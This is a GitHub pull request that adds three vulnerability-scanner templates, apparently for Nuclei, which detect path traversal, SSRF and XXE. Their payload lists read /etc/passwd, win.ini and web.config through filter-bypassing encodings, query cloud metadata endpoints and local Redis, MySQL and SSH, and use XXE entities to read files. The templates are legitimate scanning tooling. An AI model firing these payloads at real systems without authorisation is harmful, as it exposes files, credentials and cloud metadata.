Skip to content
This repository has been archived by the owner on May 2, 2024. It is now read-only.

Create ssrf.yaml,xxe.yaml,pathtraversal.yaml #16

Merged
merged 1 commit into from
Mar 6, 2023
Merged

Create ssrf.yaml,xxe.yaml,pathtraversal.yaml #16

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
134 changes: 134 additions & 0 deletions pathtraversal/pathtraversal.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,134 @@
id: pathtraversal

info:
name: pathtraversal Detection
author: pwnhxl
severity: medium
reference:
- https://owasp.org/www-community/attacks/Unicode_Encoding
tags: dast,pathtraversal

variables:
fuzz: "../../../../../../../../../../../../../../../"
fuzz_urlx2_encode: "%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f"
fuzz_hex_unicode: "%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f"
fuzz_utf8_unicode: "%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF"
fuzz_utf8_unicode_x: "%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF"
fuzz_bypass_replace: ".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../"
fuzz_bypass_replace_windows: '..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\'
fuzz_bypass_waf_regx: "./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../"

requests:
- method: GET
path:
- "{{BaseURL}}"

payloads:
pathtraversal:
- '/etc/passwd'
- 'c:/windows/win.ini'
- '../etc/passwd'
- '../../etc/passwd'
- '../../../etc/passwd'
- '../../../../etc/passwd'
- '../../../../../etc/passwd'
- '../../../../../../etc/passwd'
- '../../../../../../../etc/passwd'
- '../../../../../../../../etc/passwd'
- '../../../../../../../../../etc/passwd'
- '../../../../../../../../../../etc/passwd'
- '../../../../../../../../../../../etc/passwd'
- '../../../../../../../../../../../../etc/passwd'
- '../../../../../../../../../../../../../etc/passwd'
- '../../../../../../../../../../../../../../etc/passwd'
- '{{fuzz}}etc/passwd'
- '{{fuzz}}windows/win.ini'
- '/etc/passwd%00.jpg'
- 'c:/windows/win.ini%00.jpg'
- '{{fuzz}}etc/passwd%00.jpg'
- '{{fuzz}}windows/win.ini%00.jpg'
- '{{fuzz_urlx2_encode}}etc%252fpasswd'
- '{{fuzz_urlx2_encode}}windows%252fwin.ini'
- '{{fuzz_hex_unicode}}etc%u002fpasswd'
- '{{fuzz_hex_unicode}}windows%u002fwin.ini'
- '{{fuzz_utf8_unicode}}etc%C0%AFpasswd'
- '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini'
- '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd'
- '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini'
- '{{fuzz_bypass_replace}}etc/passwd'
- '{{fuzz_bypass_replace}}windows/win.ini'
- '{{fuzz_bypass_replace_windows}}windows\win.ini'
- '{{fuzz_bypass_waf_regx}}etc/passwd'
- '{{fuzz_bypass_waf_regx}}windows/win.ini'
- './web.config'
- '../web.config'
- '../../web.config'
- './WEB-INF/web.xml'
- '../WEB-INF/web.xml'
- '../../WEB-INF/web.xml'

fuzzing:
- part: query
mode: single
keys:
- cat
- dir
- action
- board
- date
- detail
- file
- download
- path
- folder
- prefix
- include
- page
- inc
- locate
- show
- doc
- site
- type
- view
- content
- document
- layout
- mod
- conf
- url
- img
- image
- images
fuzz:
- "{{pathtraversal}}"

- part: query
mode: single
values:
- "^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$"
fuzz:
- "{{pathtraversal}}"

stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- 'root:.*?:[0-9]*:[0-9]*:'

- type: word
part: body
words:
- 'for 16-bit app support'

- type: regex
part: body
regex:
- '(<web-app[\s\S]+<\/web-app>)'

- type: regex
part: body
regex:
- '(<system.webServer[\s\S]+<\/system.webServer>)'
116 changes: 116 additions & 0 deletions ssrf/ssrf.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,116 @@
id: ssrf

info:
name: SSRF Detection
author: pwnhxl
severity: medium
tags: dast,ssrf

requests:
- method: GET
path:
- "{{BaseURL}}"

payloads:
ssrf:
- 'file:////./etc/./passwd'
- 'file:///c:/./windows/./win.ini'
- 'http://metadata.tencentyun.com/latest/meta-data/'
- 'http://100.100.100.200/latest/meta-data/'
- 'http://169.254.169.254/latest/meta-data/'
- 'http://169.254.169.254/metadata/v1'
- 'http://127.0.0.1:22'
- 'http://127.0.0.1:3306'
- 'dict://127.0.0.1:6379/info'

fuzzing:
- part: query
mode: single
keys:
- callback
- continue
- data
- dest
- dir
- domain
- feed
- host
- html
- navigation
- next
- open
- out
- page
- path
- port
- redirect
- reference
- return
- show
- site
- to
- uri
- url
- val
- validate
- view
- window
- file
- imgurl
fuzz:
- "{{ssrf}}"

- part: query
mode: single
values:
- "(https|http|file)(%3A%2F%2F|://)(.*?)"
fuzz:
- "{{ssrf}}"

stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- 'SSH-(\d.\d)-OpenSSH_(\d.\d)'

- type: regex
part: body
regex:
- '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)'

- type: regex
part: body
regex:
- '(\d.\d.\d)(.*?)mysql_native_password'

- type: regex
part: body
regex:
- 'root:.*?:[0-9]*:[0-9]*:'

- type: word
part: body
words:
- 'for 16-bit app support'

- type: regex
part: body
regex:
- 'dns-conf/(.*?)instance/'

- type: regex
part: body
regex:
- 'app-id(.*?)placement/'

- type: regex
part: body
regex:
- 'ami-id(.*?)placement/'

- type: regex
part: body
regex:
- 'id(.*?)interfaces/'
50 changes: 50 additions & 0 deletions xxe/xxe.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
id: xxe

info:
name: XXE Detection
author: pwnhxl
severity: medium
reference:
- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
tags: dast,xxe

variables:
rletter: "{{rand_base(6,'abc')}}"

requests:
- method: GET
path:
- "{{BaseURL}}"

payloads:
xxe:
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'

fuzzing:
- part: query
mode: single
keys-regex:
- "(.*?)xml(.*?)"
fuzz:
- "{{xxe}}"

- part: query
mode: single
values:
- "(<!DOCTYPE|<?xml|%3C!DOCTYPE|%3C%3Fxml)(.*?)>"
fuzz:
- "{{xxe}}"

stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- 'root:.*?:[0-9]*:[0-9]*:'

- type: word
part: body
words:
- 'for 16-bit app support'